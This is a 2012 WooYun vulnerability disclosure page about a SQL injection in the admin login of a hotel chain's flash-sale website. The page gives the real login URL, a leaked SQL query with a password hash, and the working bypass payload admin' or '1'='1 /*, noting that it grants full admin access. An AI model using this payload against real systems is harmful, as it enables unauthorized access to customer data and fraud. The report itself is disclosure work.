当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-05156

漏洞标题:汉庭连锁酒店后台SQL注入

相关厂商:汉庭连锁酒店

漏洞作者: only_guest

提交时间:2012-03-10 10:10

修复时间:2012-04-24 10:11

公开时间:2012-04-24 10:11

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-03-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-04-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

汉庭连锁酒店后台SQL注入,可绕过登陆限制进入后台,可脱库.

详细说明:

问题发生在这个站点.http://miaosha.htinns.com/
标题内没有写具体信息.因为怕发布后被人入侵.
后台登陆地址为:http://miaosha.htinns.com/admin/admin_login.php
帐号输入admin'
登陆后提示如下图


爆出了查询语句.

Database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '453e41d218e071ccfb2d1c99ce23906a'' at line 1]
select * from users_admin where userid='admin'' and pwd='453e41d218e071ccfb2d1c99ce23906a'


重点在这里
select * from users_admin where userid='admin'' and pwd='453e41d218e071ccfb2d1c99ce23906a'
然后构造绕过
使用帐号admin' or '1'='1 /*
成功绕过登陆后台,截图如下


拥有后台全部权限...可以获得所有秒杀成功的数据,对其进行诈骗.
也可以发布秒杀信息,造成汉庭信任公关危机...
无意冒犯.我也是汉庭常客.喜欢你们的服务态度.就是网速太慢了.
啥时候能提升下网速呢?

漏洞证明:


修复方案:

过滤各种提交.

版权声明:转载请注明来源 only_guest@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝